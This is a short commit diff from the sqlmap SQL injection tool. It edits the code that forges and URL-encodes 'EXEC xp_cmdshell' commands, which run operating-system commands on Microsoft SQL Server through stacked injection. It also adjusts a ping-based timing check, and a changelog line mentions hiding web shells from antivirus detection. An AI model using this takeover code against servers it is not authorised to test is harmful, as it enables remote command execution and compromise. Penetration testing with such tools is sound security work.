Major bug fix in takeover functionalities on Microsoft SQL Server

doc/ChangeLog

@@ -42,7 +42,7 @@ sqlmap (0.8-1) stable; urgency=low
   * Added simple file encryption/compression utility, extra/cloak/cloak.py
     used by sqlmap to decrypt on the fly Churrasco executable and web
     shells consequently reduced drastically the number of anti virus
-    softwares that mistakenly mark sqlmap as a malware (Miroslav)
+    softwares that mistakenly mark sqlmap as a malware (Miroslav).
 
  -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Mon,  1 Mar 2010 10:00:00 +0000
 

lib/takeover/xp_cmdshell.py

@@ -103,7 +103,7 @@ class xp_cmdshell:
         self.xpCmdshellExecCmd(cmd)
 
     def __xpCmdshellCheck(self):
-        query    = self.xpCmdshellForgeCmd("ping -n %d 127.0.0.1" % (conf.timeSec + 2))
+        query    = self.xpCmdshellForgeCmd("ping -n %d 127.0.0.1" % (conf.timeSec * 2))
         duration = timeUse(query)
 
         if duration >= conf.timeSec:
@@ -112,14 +112,15 @@ class xp_cmdshell:
             return False
 
     def xpCmdshellForgeCmd(self, cmd):
-        return "EXEC %s '%s'" % (self.xpCmdshellStr, cmd)
+        forgedCmd = "EXEC %s '%s'" % (self.xpCmdshellStr, cmd)
+        forgedCmd = urlencode(forgedCmd, convall=True)
+
+        return forgedCmd
 
     def xpCmdshellExecCmd(self, cmd, silent=False, forgeCmd=False):
         if forgeCmd:
             cmd = self.xpCmdshellForgeCmd(cmd)
 
-        cmd = urlencode(cmd, convall=True)
-
         inject.goStacked(cmd, silent)
 
     def xpCmdshellEvalCmd(self, cmd, first=None, last=None):